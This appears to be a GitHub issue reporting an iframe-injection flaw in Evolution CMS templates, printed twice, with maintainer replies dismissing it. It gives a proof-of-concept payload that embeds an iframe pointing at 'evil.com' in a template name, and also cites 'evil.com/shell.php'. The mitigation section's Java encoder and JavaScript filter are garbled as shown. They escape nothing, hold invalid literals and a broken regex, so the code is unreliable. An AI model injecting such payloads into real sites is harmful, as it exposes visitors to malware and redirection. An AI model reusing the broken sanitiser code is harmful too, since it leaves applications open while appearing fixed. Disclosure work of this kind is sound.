Risk Description
Malware Attackers use this IFrame and include the malware websites. They are able to include the webpage one-pixel square (You won’t able to see it in webpage). Obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F – leaving no obvious clue that it’s malicious. Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.
POC
Login to Evolution CMS application
Goto the template location and try to create New template
insert the payload in description location, template name as "/><iframe/src="https://evil.com"></iframe>
save and close the template.
Now open the template list like below you will get Iframe which is running malicious.
Mitigation:
1. you should include the Content Security Policy frame-ancestors header in your HTTP response to prevent your website being loaded in a frame. Some older browsers may not have support for this header, so also use the X-Frame-Options header with value DENY, SAMEORIGIN or ALLOW-FROM uri. X-Frame-Options takes precedence over CSP frame-ancestors in some browsers. 2. You could additionally have some Javascript "frame-breaker" code that will prevent your website from being "framed" in older browsers. • Output encoding: It is recommended to implement ‘output encoding’ to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String HTMLEncode(String aTagFragment){ final StringBuffer result = new StringBuffer(); final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment); char character = iterator.current(); while (character != StringCharacterIterator.DONE ) { if (character == '<') result.append("<"); else if (character == '>') result.append(">"); else if (character == '"') result.append("""); else if (character == ''') result.append("'"); else if (character == '\') result.append("\"); else if (character == '&') result.append("&"); else { //the char is not a special one //add it to the result as is result.append(character); } character = iterator.next(); } return result.toString(); } • Escaping: Escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. EASPI API String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) ); • Filtering input parameter: Positive or "whitelist" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black-list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: <> " ' % ; ) ( & + - JavaScript Codefunction RemoveBad(strTemp) { strTemp = strTemp.replace(/<|>|"|'|%|;|(|)|&|+|-/g,""); return strTemp; }
The text was updated successfully, but these errors were encountered:
Payload will execute as separately environment cause its "iframe policy" so there is no worry about this =].
So in fact <iframe src="evil.com/shell.php"> will run shell.php on remote evil.com instead of Evolution server and JS does don't have a privilege to inject self in local DOM object :)
The fix is contrary to the access policy in the administration panel. Having access to create templates / snippets / chunks or plug-ins, you can execute arbitrary code. Therefore, XSS is not something that we should worry about.
I-Frame Injection Vulnerability
Risk Description
Malware Attackers use this IFrame and include the malware websites. They are able to include the webpage one-pixel square (You won’t able to see it in webpage). Obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F – leaving no obvious clue that it’s malicious. Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.
POC
Login to Evolution CMS application

Goto the template location and try to create New template

insert the payload in description location, template name as "/><iframe/src="https://evil.com"></iframe>

save and close the template.

Now open the template list like below you will get Iframe which is running malicious.

Mitigation:
1. you should include the Content Security Policy frame-ancestors header in your HTTP response to prevent your website being loaded in a frame. Some older browsers may not have support for this header, so also use the X-Frame-Options header with value DENY, SAMEORIGIN or ALLOW-FROM uri. X-Frame-Options takes precedence over CSP frame-ancestors in some browsers. 2. You could additionally have some Javascript "frame-breaker" code that will prevent your website from being "framed" in older browsers. • Output encoding: It is recommended to implement ‘output encoding’ to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String HTMLEncode(String aTagFragment){ final StringBuffer result = new StringBuffer(); final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment); char character = iterator.current(); while (character != StringCharacterIterator.DONE ) { if (character == '<') result.append("<"); else if (character == '>') result.append(">"); else if (character == '"') result.append("""); else if (character == ''') result.append("'"); else if (character == '\') result.append("\"); else if (character == '&') result.append("&"); else { //the char is not a special one //add it to the result as is result.append(character); } character = iterator.next(); } return result.toString(); } • Escaping: Escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. EASPI API String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) ); • Filtering input parameter: Positive or "whitelist" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black-list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: <> " ' % ; ) ( & + - JavaScript Codefunction RemoveBad(strTemp) { strTemp = strTemp.replace(/<|>|"|'|%|;|(|)|&|+|-/g,""); return strTemp; }
The text was updated successfully, but these errors were encountered: